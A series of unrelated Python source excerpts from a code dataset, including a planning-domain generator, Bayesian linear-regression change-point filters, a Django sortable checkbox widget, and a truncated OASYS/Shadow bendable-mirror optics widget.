if nbDepth < 2 :
nbDepth =2
else :
nbDepth =2
mainFolder = "depth"
if not os.path.exists(mainFolder):
subprocess.call(["mkdir", mainFolder])
generateDomain("depth", nbDepth)
#print "Every file has been written. Exiting"
def generateDomain(folderName, nbDepth):
domainFilename = folderName + "/" + folderName + "-flat" + str(nbDepth) + ".dom.anml"
printDomainToFile(domainFilename, nbDepth)
domainFilename = folderName + "/" + folderName + "-hier" + str(nbDepth) + ".dom.anml"
printDomainHierToFile(domainFilename, nbDepth)
def printDomainToFile(domainFilename, nbDepth):
with open(domainFilename, "w") as f:
for i in range(0, nbDepth):
f.write("predicate a" + str(i+1) +"();\n")
f.write("predicate b" + str(i+1) +"();\n")
f.write("predicate c" + str(i+1) +"();\n")
f.write("predicate d" + str(i+1) +"();\n")
f.write("predicate e" + str(i+1) +"();\n")
f.write("\naction An" + str(i+1) + " () {\n")
f.write("\tduration := " + durationA + ";\n")
if i > 0:
f.write("\t[start] {\n")
f.write("\t\tb"+ str(i) +" == true;\n")
f.write("\t\td"+ str(i) +" == true;\n")
f.write("\t\te"+ str(i) +" == true;\n")
f.write("\t};\n")
f.write("\t[start] a" + str(i+1) + " := true;\n")
f.write("\t[end] {\n")
f.write("\t\ta" + str(i+1) + " := false;\n")
f.write("\t\tb" + str(i+1) + " := true;\n")
f.write("\t\td" + str(i+1) + " := false;\n")
f.write("\t};\n")
f.write("};\n")
f.write("\naction Bn" + str(i+1) + " () {\n")
f.write("\tduration := " + durationB + ";\n")
f.write("\t[start] a" + str(i+1) + " == true;\n")
f.write("\t[start] c" + str(i+1) + " := true;\n")
f.write("\t[end] {\n")
f.write("\t\tc" + str(i+1) + " := false;\n")
f.write("\t\td" + str(i+1) + " := true;\n")
f.write("\t};\n")
f.write("};\n")
f.write("\naction Cn" + str(i+1) + " () {\n")
f.write("\tduration := " + durationC + ";\n")
f.write("\t[start] c" + str(i+1) + " == true;\n")
f.write("\t[end] {\n")
f.write("\t\tb" + str(i+1) + " := false;\n")
f.write("\t\te" + str(i+1) + " := true;\n")
f.write("\t};\n")
f.write("};\n")
######################## problem ###############
f.write("\n/*******Problem************/\n")
f.write("[all] contains{\n")
f.write("\tCn" + str(nbDepth) +"();\n")
f.write("};")
def printDomainHierToFile(domainFilename, nbDepth):
with open(domainFilename, "w") as f:
for i in range(0, nbDepth):
if i == 0:
f.write("\naction An" + str(i+1) + " () {\n")
f.write("\tmotivated;\n")
f.write("\tduration := " + durationA + ";\n")
f.write("};\n")
else:
f.write("\naction An" + str(i+1) + " () {\n")
f.write("\tmotivated;\n")
f.write("\tduration := " + durationA + ";\n")
f.write("\ta : ABC" + str(i) + "();\n")
f.write("\t end(a) < start;\n")
f.write("};\n")
f.write("\naction Bn" + str(i+1) + " () {\n")
f.write("\tduration := " + durationB + ";\n")
f.write("\tmotivated;\n")
f.write("};\n")
f.write("\naction Cn" + str(i+1) + " () {\n")
f.write("\tduration := " + durationC + ";\n")
f.write("\tmotivated;\n")
f.write("};\n")
f.write("\naction ABC" + str(i+1) + " () {\n")
f.write("\t[all] contains {\n")
f.write("\t\t b" + str(i+1) + " : An" + str(i+1) + "();\n")
f.write("\t\t d" + str(i+1) + " : Bn" + str(i+1) + "();\n")
f.write("\t\t e" + str(i+1) + " : Cn" + str(i+1) + "();\n")
f.write("\t};\n")
f.write("\tstart(b" + str(i+1) + ") < start(d" + str(i+1) + ");\n")
f.write("\tend(d" + str(i+1) + ") < end(b" + str(i+1) + ");\n")
f.write("\tstart(d" + str(i+1) + ") < start(e" + str(i+1) + ");\n")
f.write("\tend(e" + str(i+1) + ") < end(d" + str(i+1) + ");\n")
f.write("};\n")
#################### problem #############
f.write("\n/*******Problem************/\n")
f.write("[all] contains{\n")
f.write("\tCn" + str(nbDepth) +"();\n")
f.write("};")
if __name__ == "__main__":
main()
| StarcoderdataPython |
1700791 | <gh_stars>1-10
#!/usr/bin/python
# -*- coding: utf-8 -*-
import ujson
from typing import Dict, Tuple, List, Set, Union, Optional, Any
from pyutils.progress_utils import Timer
from experiments.evaluation_metrics import DataNodeMode
from semantic_labeling import create_semantic_typer
from semantic_modeling.assembling.autolabel.align_graph import align_graph
from semantic_modeling.data_io import get_semantic_models
from semantic_modeling.karma.semantic_model import SemanticModel
from semantic_modeling.link_prediction.int_graph import IntGraph, add_known_models, IntGraphNode, create_psl_int_graph
def oracle_link_prediction(g: IntGraph, sm: SemanticModel):
# step 1: find a mapping between g and sm that yield maximum F1 score
alignment = align_graph(sm.graph, g, DataNodeMode.IGNORE_DATA_NODE)
bijection = alignment['_bijections'][0]
true_links = set()
for attr in sm.attrs:
dnode = sm.graph.get_node_by_id(attr.id)
dlink = dnode.get_first_incoming_link()
if dlink.source_id in bijection.x2prime:
n: IntGraphNode = g.get_node_by_id(bijection.x2prime[dlink.source_id])
if any(st.domain.encode("utf-8") == n.label and st.type.encode('utf-8') == dlink.label for st in
attr.semantic_types):
true_links.add((n.readable_id, dlink.label, attr.label))
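# step 2: collect class-to-class links whose endpoints are both mapped by the bijection and whose label is preserved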
for n in sm.graph.iter_nodes():
for e in n.iter_outgoing_links():
if e.get_target_node().is_data_node():
continue
# if e.source_id in bijection.prime2x and e.target_id in bijection.prime2x:
if bijection.x2prime.get(e.source_id, None) is not None and bijection.x2prime.get(e.target_id,
None) is not None:
source = g.get_node_by_id(bijection.x2prime[e.source_id])
ne = next((ne for ne in source.iter_outgoing_links() if ne.target_id == bijection.x2prime[e.target_id]),
None)
if ne is not None and e.label == ne.label:
true_links.add((source.readable_id, e.label, ne.get_target_node().readable_id))
return true_links
if __name__ == '__main__':
timer = Timer().start()
dataset = "museum_edm"
train_size = 14
semantic_models = get_semantic_models(dataset)
semantic_typer = create_semantic_typer(dataset, semantic_models[:train_size])
semantic_typer.semantic_labeling(semantic_models[:train_size], semantic_models[train_size:], 4, True)
int_graph = create_psl_int_graph(semantic_models[:train_size])
print("Preprocessing takes...", timer.lap().report(full_report=True))
results = oracle_link_prediction(int_graph, semantic_models[3])
print(ujson.dumps(results, indent=4))
print("Finish", timer.lap().report(full_report=True))
| StarcoderdataPython |
1637853 | <reponame>frbry/django-sortedone2many
# -*- coding: utf-8 -*-
from itertools import chain
from django import forms
from django.template.loader import render_to_string
from django.utils.encoding import force_text
from django.utils.html import conditional_escape
from django.utils.safestring import mark_safe
from sortedm2m.forms import SortedCheckboxSelectMultiple, SortedMultipleChoiceField
class SortedCheckboxSelectMultipleWithDisabled(SortedCheckboxSelectMultiple):
'''
Render a list of ``choices`` as checkboxes that can be sorted using drag & drop.
Some checkboxes are rendered as "disabled" according to the ``disabled_value``.
'''
# override render()
def render(self, name, value, attrs=None, choices=()):
disabled_value = getattr(self, 'disabled_value', [])
if value is None: value = []
has_id = attrs and 'id' in attrs
final_attrs = self.build_attrs(attrs, name=name)
# Normalize to strings
str_values = [force_text(v) for v in value]
selected = []
unselected = []
for i, (option_value, option_label) in enumerate(chain(self.choices, choices)):
# If an ID attribute was given, add a numeric index as a suffix,
# so that the checkboxes don't all have the same ID attribute.
if has_id:
final_attrs = dict(final_attrs, id='%s_%s' % (attrs['id'], i))
label_for = ' for="%s"' % conditional_escape(final_attrs['id'])
else:
label_for = ''
# if an item has a category other than the current showing category
if option_value in disabled_value and option_value not in value:
extra_attrs = {'disabled': 'disabled'}
else:
extra_attrs = {}
cb = forms.CheckboxInput(final_attrs, check_test=lambda value: value in str_values)
option_value = force_text(option_value)
rendered_cb = cb.render(name, option_value, attrs=extra_attrs)
option_label = conditional_escape(force_text(option_label))
item = {'label_for': label_for, 'rendered_cb': rendered_cb, 'option_label': option_label, 'option_value': option_value}
if option_value in str_values:
selected.append(item)
else:
unselected.append(item)
# re-order `selected` array according str_values which is a set of `option_value`s in the order they should be shown on screen
ordered = []
for value in str_values:
for select in selected:
if value == select['option_value']:
ordered.append(select)
selected = ordered
html = render_to_string(
'sortedm2m/sorted_checkbox_select_multiple_widget.html',
{'selected': selected, 'unselected': unselected})
return mark_safe(html)
class SortedMultipleChoiceWithDisabledField(SortedMultipleChoiceField):
'''
Form field to render a ``SortedOneToManyField`` of a model as a list of
``choices`` or checkboxes that can be sorted using drag & drop.
This form field also adds a special behaviour to the widget:
it disables the checkboxes that must not be selected directly
on the current admin view (to keep the ``OneToMany`` relationship unique).
E.g., on the admin view for ``category 1``,
``item1.category`` is ``category 2``, so the checkbox for ``item1`` is disabled
because ``category 2`` has to remove ``item1`` from its ``items`` list before
``category 1`` can select ``item1`` in the admin view.
Pass a list of ``disabled_value`` to the widget so that the widget can decide
whether to render a checkbox as "disabled".
'''
widget = SortedCheckboxSelectMultipleWithDisabled
def __init__(self, related_query_name, *args, **kwargs):
super(SortedMultipleChoiceWithDisabledField, self).__init__(*args, **kwargs)
# find all items that have an non-null category
disabled_value = self.queryset.filter(**{related_query_name + '__isnull':False}
).values_list('pk', flat=True)
self.widget.disabled_value = disabled_value
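# Illustrative usage (the model and field names below are hypothetical, chosen to match the
# category/items example in the docstring above):
#
# class CategoryAdminForm(forms.ModelForm):
#     items = SortedMultipleChoiceWithDisabledField(
#         related_query_name='category',
#         queryset=Item.objects.all(),
#         required=False,
#     )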
| StarcoderdataPython |
3254127 | import os
import sys
import numpy as np
from bocd import BOCD_BayesianLinearRegression
from vbs import print_log, BeamSearchHelper, get_beam_search_helper
from bayes_linear_regression import BayesLinReg
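# Illustrative `config` layout (keys are assembled from what the functions below read;
# the concrete values are placeholders, not the settings used in any experiment):
#
# config = {
#     'dataset': 'sensordrift', 'num_feature': 128, 'sigma_n': 1.0, 'logodds': False,
#     'vbs':  {'K': 3, 'beta': {3: 0.9}, 'p': {3: 0.01}},
#     'bocd': {'hazard': 0.01, 'K': 3},
#     'bf':   {'beta': 0.9},
# }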
def vbs_filter(x_train_set, y_train_set, x_test_set, y_test_set, config):
dataset = config['dataset']
num_feature = config['num_feature']
sigma_n = config['sigma_n']
beam_size = config['vbs']['K']
beta = config['vbs']['beta'][beam_size]
p = config['vbs']['p'][beam_size]
folder_name = f'./{dataset}_ckpt_vbs_p{p}_beta{beta}_sigma{sigma_n}_b{beam_size}/'
os.mkdir(folder_name)
prior_logodds = np.log(p/(1-p))
sigma_p = np.eye(num_feature)
bsh = get_beam_search_helper(folder_name + '/helper.pkl',
save_folder=folder_name,
beam_size=beam_size,
diffusion=beta,
jump_bias=prior_logodds)
abs_errs = []
abs_1st_errs = []
for task_id, (x_train, y_train, x_test, y_test) in enumerate(
zip(x_train_set,
y_train_set,
x_test_set,
y_test_set)):
if task_id % 2000 == 0:
print('='*75)
print(f"Start task {task_id}.")
if task_id <= bsh.task_id:
print(f"Task {task_id} is already trained. Skip training.")
continue
hypotheses = bsh.get_new_hypotheses_args(x_train, y_train, x_test, y_test)
mu_set, Lambda_set, elbos, test_y_preds = [], [], [], []
num_hypotheses = len(hypotheses)
for hypothesis in hypotheses:
(model_name,
s_t,
diffusion,
mu,
Lambda,
x_train,
y_train,
x_test,
y_test) = hypothesis
if dataset == 'sensordrift':
'''This procedure outputs the correct model evidence:
p(x|s) = int p(x|w) p(w|s) dw
'''
# compile the args
if mu is None:
mu = np.zeros(num_feature)
if Lambda is None:
Lambda = np.eye(num_feature)
# initialization
linreg = BayesLinReg(num_feature=num_feature,
sigma_n=sigma_n,
mu_0=mu,
Lambda=Lambda)
# broaden if required
if s_t == 1:
linreg.broaden_Bayesian_forget(diffusion) # beta = diffusion
# compute predictive probability
marginal_likelihood = linreg.marginal_likelihood(x_train, y_train)
if marginal_likelihood == 0:
# computation stability
raise ValueError('marginal_likelihood == 0')
log_marginal_likelihood = -5
else:
log_marginal_likelihood = np.log(marginal_likelihood)
elbos.append(log_marginal_likelihood)
# absorb new evidence
linreg.update(x_train, y_train)
# save weights
mu_set.append(linreg.mu)
Lambda_set.append(linreg.Lambda)
# prediction
test_y_preds.append(linreg.predict_mean(x_test))
else:
'''This implementation "reverses" the `update()` and `elbo`
(marginal evidence) computation, which counts "twice" the
likelihood.
Note this procedure outputs the model evidence with tempered
likelihood:
p(x|s) propto int p(x|w)^2 p(w|s) dw
'''
# compile the args
if mu is None:
mu = np.zeros(num_feature)
if Lambda is None:
Lambda = np.eye(num_feature)
if s_t == 1:
Lambda /= diffusion # beta = 1/diffusion
# predict and absorb new evidence
linreg = BayesLinReg(num_feature=num_feature,
sigma_n=sigma_n,
mu_0=mu,
Lambda=Lambda)
linreg.update(x_train, y_train)
# save weights
mu_set.append(linreg.mu)
Lambda_set.append(linreg.Lambda)
# compute elbo and predict new samples
marginal_likelihood = linreg.marginal_likelihood(x_train, y_train)
if marginal_likelihood == 0:
# computation stability
log_marginal_likelihood = -5
else:
log_marginal_likelihood = np.log(marginal_likelihood)
elbos.append(log_marginal_likelihood)
test_y_preds.append(linreg.predict_mean(x_test))
bsh.absorb_new_evidence_and_prune_beams(elbos, mu_set, Lambda_set)
# ensemble prediction
test_y_pred = bsh.weighted_test_probability(test_y_preds)
if config['logodds']:
test_y_pred = 1 / (1 + np.exp(-test_y_pred))
abs_err = np.abs(test_y_pred - y_test)
abs_errs.append(abs_err)
# most likely prediction
test_y_pred_1st = test_y_preds[bsh._indices[0]]
if config['logodds']:
test_y_pred_1st = 1 / (1 + np.exp(-test_y_pred_1st))
abs_1st_err = np.abs(test_y_pred_1st - y_test)
abs_1st_errs.append(abs_1st_err)
if task_id % 10000 == 0:
print('vbs mean error (ensemble):', np.mean(abs_errs))
print('vbs mean error (most likely):', np.mean(abs_1st_errs))
np.save(folder_name + './abs_errs.npy', abs_errs)
np.save(folder_name + './abs_1st_errs.npy', abs_1st_errs)
print('Results saved to', folder_name)
print('vbs mean error (ensemble):', np.mean(abs_errs))
print('vbs mean error (most likely):', np.mean(abs_1st_errs))
return abs_1st_errs, abs_errs
def bocd_filter(x_train_set, y_train_set, x_test_set, y_test_set, config):
num_feature = config['num_feature']
sigma_n = config['sigma_n']
hazard = config['bocd']['hazard']
res_num = config['bocd']['K']
dataset = config['dataset']
folder_name = f'./{dataset}_ckpt_bocd_hazard{hazard}_sigma{sigma_n}_K{res_num}/'
os.mkdir(folder_name)
bocd_helper = BOCD_BayesianLinearRegression(
num_feature=num_feature,
hazard=hazard,
res_num=res_num)
abs_errs, abs_1st_errs = [], []
for i, (x_train, y_train, x_test, y_test) in enumerate(
zip(x_train_set,
y_train_set,
x_test_set,
y_test_set)):
# add a new run length hypothesis
bocd_helper.add_new_cp_hypo()
# evaluate each run length
for rl in bocd_helper.run_lens:
mu, Lambda = rl.params
linreg = BayesLinReg(num_feature=num_feature,
sigma_n=sigma_n,
mu_0=mu,
Lambda=Lambda)
pred_prob = linreg.marginal_likelihood(x_train, y_train)
rl.pred_prob = pred_prob
# infer posterior distributions and update
linreg.update(x_train, y_train)
rl.params = [linreg.mu, linreg.Lambda]
# prediction
rl.test_pred = linreg.predict_mean(x_test)
# rank and prune
bocd_helper.step()
# evaluation
# ensemble prediction
test_y_pred = np.sum([rl.prob*rl.test_pred
for rl in bocd_helper.run_lens])
if config['logodds']:
test_y_pred = 1 / (1 + np.exp(-test_y_pred))
abs_err = np.abs(test_y_pred - y_test)
abs_errs.append(abs_err)
# most likely prediction
test_y_pred_1st = bocd_helper.run_lens[0].test_pred
if config['logodds']:
test_y_pred_1st = 1 / (1 + np.exp(-test_y_pred_1st))
abs_1st_err = np.abs(test_y_pred_1st - y_test)
abs_1st_errs.append(abs_1st_err)
np.save(folder_name + './abs_errs.npy', abs_errs)
np.save(folder_name + './abs_1st_errs.npy', abs_1st_errs)
print('Results saved to', folder_name)
print('bocd mean error (ensemble):', np.mean(abs_errs))
print('bocd mean error (most likely):', np.mean(abs_1st_errs))
return abs_1st_errs, abs_errs
def bf_filter(x_train_set, y_train_set, x_test_set, y_test_set, config):
beta = config['bf']['beta']
sigma_n = config['sigma_n']
dataset = config['dataset']
folder_name = f'./{dataset}_ckpt_bf_beta{beta}_sigma{sigma_n}/'
os.mkdir(folder_name)
bayes_linreg = BayesLinReg(num_feature=config['num_feature'],
sigma_p=np.eye(config['num_feature']),
sigma_n=sigma_n)
abs_errs = []
for i, (x_train, y_train, x_test, y_test) in enumerate(
zip(x_train_set,
y_train_set,
x_test_set,
y_test_set)):
# update
bayes_linreg.update(x_train, y_train, compute_cov=False)
# predict
if config['logodds']:
y_test_pred = bayes_linreg.logit_predict_map(x_test)
else:
y_test_pred = bayes_linreg.predict_mean(x_test)
# error
abs_errs.append(np.abs(y_test_pred - y_test))
# broaden the posterior (Bayesian forgetting): inflate its covariance by beta so older evidence is gradually discounted and the model can track drift
bayes_linreg.broaden_Bayesian_forget(beta)
np.save(folder_name + './abs_errs.npy', abs_errs)
print('Results saved to', folder_name)
mean_err = np.mean(abs_errs)
print('bf mean error:', mean_err)
return abs_errs
def vcl_filter(x_train_set, y_train_set, x_test_set, y_test_set, config):
dataset = config['dataset']
sigma_n = config['sigma_n']
folder_name = f'./{dataset}_ckpt_vcl_sigma{sigma_n}/'
os.mkdir(folder_name)
bayes_linreg = BayesLinReg(num_feature=config['num_feature'],
sigma_p=np.eye(config['num_feature']),
sigma_n=sigma_n)
abs_errs = []
for i, (x_train, y_train, x_test, y_test) in enumerate(
zip(x_train_set,
y_train_set,
x_test_set,
y_test_set)):
# update
bayes_linreg.update(x_train, y_train, compute_cov=False)
# predict
if config['logodds']:
y_test_pred = bayes_linreg.logit_predict_map(x_test)
else:
y_test_pred = bayes_linreg.predict_mean(x_test)
# error
abs_errs.append(np.abs(y_test_pred - y_test))
np.save(folder_name + './abs_errs.npy', abs_errs)
print('Results saved to', folder_name)
mean_err = np.mean(abs_errs)
print('vcl mean error:', mean_err)
return abs_errs
def ib_filter(x_train_set, y_train_set, x_test_set, y_test_set, config):
dataset = config['dataset']
sigma_n = config['sigma_n']
folder_name = f'./{dataset}_ckpt_ib_sigma{sigma_n}/'
os.mkdir(folder_name)
abs_errs = []
for i, (x_train, y_train, x_test, y_test) in enumerate(
zip(x_train_set,
y_train_set,
x_test_set,
y_test_set)):
bayes_linreg = BayesLinReg(num_feature=config['num_feature'],
sigma_p=np.eye(config['num_feature']),
sigma_n=sigma_n)
# update
bayes_linreg.update(x_train, y_train, compute_cov=False)
# predict
if config['logodds']:
y_test_pred = bayes_linreg.logit_predict_map(x_test)
else:
y_test_pred = bayes_linreg.predict_mean(x_test)
# error
abs_errs.append(np.abs(y_test_pred - y_test))
np.save(folder_name + './abs_errs.npy', abs_errs)
print('Results saved to', folder_name)
mean_err = np.mean(abs_errs)
print('ib mean error:', mean_err)
return abs_errs | StarcoderdataPython |
1770474 | <gh_stars>0
from distutils.core import setup
requires = [
'websocket_client',
'PyYAML',
]
setup(
name='GeminiDataService',
version='0.1.0',
author='<NAME>',
author_email='<EMAIL>',
packages=['geminidata.service','geminidata'],
scripts=['geminidata-service.py'],
url='',
license='LICENSE',
description='Merge/Massage Gemini Data feeds, as a service',
long_description='Massage gemini websocket feeds while broadcasting to unix socket',
install_requires=requires
)
| StarcoderdataPython |
139140 | import os, sys, numpy
from scipy.interpolate import RectBivariateSpline, interp2d
from scipy.optimize import curve_fit
from matplotlib import cm
from matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg
from matplotlib.figure import Figure
try:
from mpl_toolkits.mplot3d import Axes3D # needed to load the 3D plots
except:
pass
from PyQt5.QtWidgets import QApplication
from PyQt5.QtCore import QSettings
from orangewidget import gui
from orangewidget.settings import Setting
from oasys.widgets import gui as oasysgui
from oasys.widgets import congruence
from oasys.util.oasys_util import TriggerIn
from orangecontrib.shadow.util.shadow_objects import ShadowOpticalElement, ShadowBeam, ShadowPreProcessorData
from orangecontrib.shadow.util.shadow_util import ShadowPreProcessor
from orangecontrib.shadow.widgets.gui import ow_ellipsoid_element, ow_optical_element
from Shadow import ShadowTools as ST
TRAPEZIUM = 0
RECTANGLE = 1
SINGLE_MOMENTUM = 0
DOUBLE_MOMENTUM = 1
class BendableEllipsoidMirror(ow_ellipsoid_element.EllipsoidElement):
name = "Bendable Ellipsoid Mirror"
description = "Shadow OE: Bendable Ellipsoid Mirror"
icon = "icons/bendable_ellipsoid_mirror.png"
maintainer = "<NAME>"
maintainer_email = "<EMAIL>"
priority = 6
category = "Optical Elements"
keywords = ["data", "file", "load", "read"]
send_footprint_beam = QSettings().value("output/send-footprint", 0, int) == 1
if send_footprint_beam:
outputs = [{"name":"Beam",
"type":ShadowBeam,
"doc":"Shadow Beam",
"id":"beam"},
{"name":"Footprint",
"type":list,
"doc":"Footprint",
"id":"beam"},
{"name":"Trigger",
"type": TriggerIn,
"doc":"Feedback signal to start a new beam simulation",
"id":"Trigger"},
{"name": "PreProcessor_Data",
"type": ShadowPreProcessorData,
"doc": "PreProcessor Data",
"id": "PreProcessor_Data"}
]
else:
outputs = [{"name":"Beam",
"type":ShadowBeam,
"doc":"Shadow Beam",
"id":"beam"},
{"name":"Trigger",
"type": TriggerIn,
"doc":"Feedback signal to start a new beam simulation",
"id":"Trigger"},
{"name": "PreProcessor_Data",
"type": ShadowPreProcessorData,
"doc": "PreProcessor Data",
"id": "PreProcessor_Data"}
]
show_bender_plots = Setting(0)
bender_bin_x = Setting(100)
bender_bin_y = Setting(500)
E = Setting(131000)
h = Setting(10)
kind_of_bender = Setting(1)
shape = Setting(0)
output_file_name = Setting("mirror_bender.dat")
which_length = Setting(0)
optimized_length = Setting(0.0)
M1 = Setting(0.0)
ratio = Setting(0.5)
e = Setting(0.3)
M1_out = 0.0
ratio_out = 0.0
e_out = 0.0
M1_fixed = Setting(False)
ratio_fixed = Setting(False)
e_fixed = Setting(False)
M1_min = Setting(0.0)
ratio_min = Setting(0.0)
e_min = Setting(0.0)
M1_max = Setting(1000.0)
ratio_max = Setting(10.0)
e_max = Setting(1.0)
def __init__(self):
graphical_Options=ow_optical_element.GraphicalOptions(is_mirror=True)
super().__init__(graphical_Options)
tabs = gui.tabWidget(oasysgui.createTabPage(self.tabs_basic_setting, "Bender"))
tab_bender = oasysgui.createTabPage(tabs, "Bender Setting")
surface_box = oasysgui.widgetBox(tab_bender, "Surface Setting", addSpace=False, orientation="vertical")
oasysgui.lineEdit(surface_box, self, "bender_bin_x", "bins Sagittal", labelWidth=260, valueType=int, orientation="horizontal")
oasysgui.lineEdit(surface_box, self, "bender_bin_y", "bins Transversal", labelWidth=260, valueType=int, orientation="horizontal")
material_box = oasysgui.widgetBox(tab_bender, "Bender Setting", addSpace=False, orientation="vertical")
self.le_E = oasysgui.lineEdit(material_box, self, "E", "Young's Modulus ", labelWidth=260, valueType=float, orientation="horizontal")
self.le_h = oasysgui.lineEdit(material_box, self, "h", "Thickness ", labelWidth=260, valueType=float, orientation="horizontal")
gui.comboBox(material_box, self, "kind_of_bender", label="Kind Of Bender ", items=["Single Momentum", "Double Momentum"],
labelWidth=150, orientation="horizontal", callback=self.set_kind_of_bender)
gui.comboBox(material_box, self, "shape", label="Shape ", items=["Trapezium", "Rectangle"],
labelWidth=150, orientation="horizontal", callback=self.set_shape)
tab_fit = oasysgui.createTabPage(tabs, "Fit Setting")
fit_box = oasysgui.widgetBox(tab_fit, "", addSpace=False, orientation="vertical")
file_box = oasysgui.widgetBox(fit_box, "", addSpace=False, orientation="horizontal", height=25)
self.le_output_file_name = oasysgui.lineEdit(file_box, self, "output_file_name", "Out File Name", labelWidth=100, valueType=str, orientation="horizontal")
gui.button(file_box, self, "...", callback=self.select_output_file, width=20)
length_box = oasysgui.widgetBox(fit_box, "", addSpace=False, orientation="horizontal")
self.cb_optimized_length = gui.comboBox(length_box, self, "which_length", label="Optimized Length ", items=["Total", "Partial"],
labelWidth=150, orientation="horizontal", callback=self.set_which_length)
self.le_optimized_length = oasysgui.lineEdit(length_box, self, "optimized_length", " ", labelWidth=10, valueType=float, orientation="horizontal")
self.set_which_length()
gui.separator(fit_box)
def add_parameter_box(container_box, variable, label):
box = oasysgui.widgetBox(container_box, "", addSpace=False, orientation="horizontal")
oasysgui.lineEdit(box, self, variable, label, labelWidth=50, valueType=float, orientation="horizontal")
gui.label(box, self, " ", labelWidth=58)
box = oasysgui.widgetBox(container_box, "", addSpace=False, orientation="horizontal")
setattr(self, "le_" + variable + "_min", oasysgui.lineEdit(box, self, variable + "_min", "Min",
labelWidth=50, valueType=float, orientation="horizontal"))
setattr(self, "le_" + variable + "_max", oasysgui.lineEdit(box, self, variable + "_max", "Max",
labelWidth=35, valueType=float, orientation="horizontal"))
gui.checkBox(box, self, variable + "_fixed", "Fixed", callback=getattr(self, "set_" + variable))
box = oasysgui.widgetBox(container_box, "", addSpace=False, orientation="horizontal")
le = oasysgui.lineEdit(box, self, variable + "_out", "Fitted", labelWidth=50, valueType=float, orientation="horizontal")
le.setEnabled(False)
le.setStyleSheet("color: blue; background-color: rgb(254, 244, 205); font:bold")
def set_variable_fit(): setattr(self, variable, getattr(self, variable + "_out"))
gui.button(box, self, "<- Use", width=58, callback=set_variable_fit)
getattr(self, "set_" + variable)()
m1_box = oasysgui.widgetBox(fit_box, "", addSpace=False, orientation="vertical")
gui.separator(fit_box, 10)
self.ratio_box = oasysgui.widgetBox(fit_box, "", addSpace=False, orientation="vertical")
gui.separator(fit_box, 10)
self.e_box = oasysgui.widgetBox(fit_box, "", addSpace=False, orientation="vertical")
gui.separator(fit_box, 10)
add_parameter_box(m1_box, "M1", "M1")
add_parameter_box(self.ratio_box, "ratio", "M1/M2")
add_parameter_box(self.e_box, "e", "e")
self.set_kind_of_bender()
self.set_shape()
#######################################################
plot_tab = oasysgui.createTabPage(self.main_tabs, "Bender Plots")
view_box = oasysgui.widgetBox(plot_tab, "Plotting Style", addSpace=False, orientation="vertical", width=350)
self.view_type_combo = gui.comboBox(view_box, self, "show_bender_plots", label="Show Plots", labelWidth=220,
items=["No", "Yes"], sendSelectedValue=False, orientation="horizontal")
bender_tabs = oasysgui.tabWidget(plot_tab)
tabs = [oasysgui.createTabPage(bender_tabs, "Bender vs. Ideal (1D)"),
oasysgui.createTabPage(bender_tabs, "Ideal - Bender (1D)"),
oasysgui.createTabPage(bender_tabs, "Ideal - Bender (3D)"),
oasysgui.createTabPage(bender_tabs, "Figure Error (3D)"),
oasysgui.createTabPage(bender_tabs, "Ideal - Bender + Figure Error (3D)")]
def create_figure_canvas(mode="3D"):
figure = Figure(figsize=(100, 100))
figure.patch.set_facecolor('white')
if mode == "3D": figure.add_subplot(111, projection='3d')
else: figure.add_subplot(111)
figure_canvas = FigureCanvasQTAgg(figure)
figure_canvas.setFixedWidth(self.IMAGE_WIDTH)
figure_canvas.setFixedHeight(self.IMAGE_HEIGHT-10)
return figure_canvas
self.figure_canvas = [create_figure_canvas("1D"), create_figure_canvas("1D"),
create_figure_canvas(), create_figure_canvas(), create_figure_canvas()]
for tab, figure_canvas in zip(tabs, self.figure_canvas): tab.layout().addWidget(figure_canvas)
gui.rubber(self.controlArea)
gui.rubber(self.mainArea)
################################################################
#
# SHADOW MANAGEMENT
#
################################################################
def select_output_file(self):
self.le_output_file_name.setText(oasysgui.selectFileFromDialog(self, self.output_file_name, "Select Output File", file_extension_filter="Data Files (*.dat)"))
def set_kind_of_bender(self):
self.ratio_box.setVisible(self.kind_of_bender==1)
def set_shape(self):
self.e_box.setVisible(self.shape==0)
def set_which_length(self):
self.le_optimized_length.setEnabled(self.which_length==1)
def set_M1(self):
self.le_M1_min.setEnabled(self.M1_fixed==False)
self.le_M1_max.setEnabled(self.M1_fixed==False)
def set_ratio(self):
self.le_ratio_min.setEnabled(self.ratio_fixed==False)
self.le_ratio_max.setEnabled(self.ratio_fixed==False)
def set_e(self):
self.le_e_min.setEnabled(self.e_fixed==False)
self.le_e_max.setEnabled(self.e_fixed==False)
def after_change_workspace_units(self):
super().after_change_workspace_units()
label = self.le_E.parent().layout().itemAt(0).widget()
label.setText(label.text() + " [N/" + self.workspace_units_label + "^2]")
label = self.le_h.parent().layout().itemAt(0).widget()
label.setText(label.text() + " [" + self.workspace_units_label + "]")
label = self.cb_optimized_length.parent().layout().itemAt(0).widget()
label.setText(label.text() + " [" + self.workspace_units_label + "]")
def checkFields(self):
super().checkFields()
if self.is_cylinder != 1: raise ValueError("Bender Ellipse must be a cylinder")
if self.cylinder_orientation != 0: raise ValueError("Cylinder orientation must be 0")
if self.is_infinite == 0: raise ValueError("This OE can't have infinite dimensions")
if self.which_length==1:
congruence.checkStrictlyPositiveNumber(self.optimized_length, "Optimized Length")
congruence.checkLessOrEqualThan(self.optimized_length, self.dim_y_plus+self.dim_y_minus, "Optimized Length", "Total Length")
if self.modified_surface > 0:
if not (self.modified_surface == 1 and self.ms_type_of_defect == 2):
raise ValueError("Only Preprocessor generated error profiles are admitted")
congruence.checkStrictlyPositiveNumber(self.bender_bin_x, "Bins X")
congruence.checkStrictlyPositiveNumber(self.bender_bin_y, "Bins Y")
self.output_file_name_full = congruence.checkFileName(self.output_file_name)
def completeOperations(self, shadow_oe):
shadow_oe_temp = shadow_oe.duplicate()
input_beam_temp = self.input_beam.duplicate(history=False)
self.manage_acceptance_slits(shadow_oe_temp)
ShadowBeam.traceFromOE(input_beam_temp,
shadow_oe_temp,
write_start_file=0,
write_end_file=0,
widget_class_name=type(self).__name__)
x, y, z = self.calculate_ideal_surface(shadow_oe_temp)
bender_parameter, z_bender_correction = self.calculate_bender_correction(y, z, self.kind_of_bender, self.shape)
self.M1_out = round(bender_parameter[0], int(6*self.workspace_units_to_mm))
if self.shape == TRAPEZIUM:
self.e_out = round(bender_parameter[1], 5)
if self.kind_of_bender == DOUBLE_MOMENTUM: self.ratio_out = round(bender_parameter[2], 5)
elif self.shape == RECTANGLE:
if self.kind_of_bender == DOUBLE_MOMENTUM: self.ratio_out = round(bender_parameter[1], 5)
self.plot3D(x, y, z_bender_correction, 2, "Ideal - Bender Surfaces")
if self.modified_surface > 0:
